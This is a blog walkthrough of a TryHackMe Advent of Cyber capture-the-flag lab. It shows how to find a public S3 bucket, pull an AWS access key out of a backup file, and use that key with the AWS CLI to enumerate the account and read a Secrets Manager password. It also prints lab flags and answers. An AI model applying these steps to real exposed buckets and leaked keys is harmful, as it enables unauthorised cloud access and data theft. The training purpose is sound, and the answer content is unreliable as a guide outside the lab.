Advent of Cyber 3 (2021): Day 17 Write-up Elf Leaks [TryHackMe]

Hey Guys! We are back with Day 17 of the “Advent of Cyber” event by TryHackMe. If you haven’t solved the Day 1 challenge click here.

This time we have a challenge of Cloud named “Elf Leaks”.

Today’s Learning Objective

Today we’ll be covering the basics of AWS — one of the leading public cloud providers, and two of its most common services — Amazon S3 (Simple Storage Service) and AWS IAM (Identity and Access Management).

We’ll show you how to get started with the AWS CLI, then describe how to discover public S3 buckets, look at what’s inside. We will also look at how you could leverage an IAM Access Key & Secret.

Let’s Get Started..

1. What is the name of the S3 Bucket used to host the HR Website announcement?

Open the image in a new tab and you’ll see the link.

Answer: images.bestfestivalcompany.com

2. What is the message left in the flag.txt object from that bucket?

Link: https://s3.amazonaws.com/images.befestivalcompany.com/flag.txt

Answer: It's easy to get your elves data when you leave it so easy to find!

3. What other file in that bucket looks interesting to you?

Answer: wp-backup.zip

4. What is the AWS Access Key ID in that file?

As you go to the link of wp-backup.zip: https://s3.amazonaws.com/images.befestivalcompany.com/wp-backup.zip The file will be downloaded.

Unzip it, go to that directory and search for the Access Key ID using grep

cat * | grep AKIA

We get it in the file wp-config.php

Answer: AKIAQI52OJVCPZXFYAOI

5. What is the AWS Account ID that access-key works for?

For this first you’ll have to configure aws with a profile name.

We’ll keep our profile name as Hacker for this one.

aws configure —-profile hacker

aws sts get-access-key-info --access-key-id AKIAQI52OJVCPZXFYAOI --profile hacker

Answer: 019181489476

6. What is the Username for that access-key?

aws sts get-caller-identity --profile hacker

Answer: ElfMcHR@bfc.com

7. There is an EC2 Instance in this account. Under the TAGs, what is the Name of the instance?

aws ec2 describe-instances --output text --profile hacker

Answer: HR-Portal

8. What is the database password stored in Secrets Manager?

aws secretsmanager get-secret-value --secret-id HR-Password --profile hacker --region eu-north-1

Answer: Winter2021!

Thank you for reading! See you tomorrow!!

Please clap👏 if you like what we are doing and drop your thoughts and love❤️ in the comment section.

Do Follow us on our LinkedIn: https://www.linkedin.com/company/rootissh

Stay Tuned for more Writeups of this event as well others!